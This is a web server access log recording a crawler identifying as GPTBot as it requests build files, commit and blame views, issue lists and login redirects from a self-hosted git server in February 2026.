"https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14549] [Gzip 8.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11399] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14395] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14894] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:48:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:48:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19726] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11379] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16266] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:48:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15512] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11310] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12241] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:48:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16676] [Gzip 12.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9870] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:18:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:18:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:48:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" 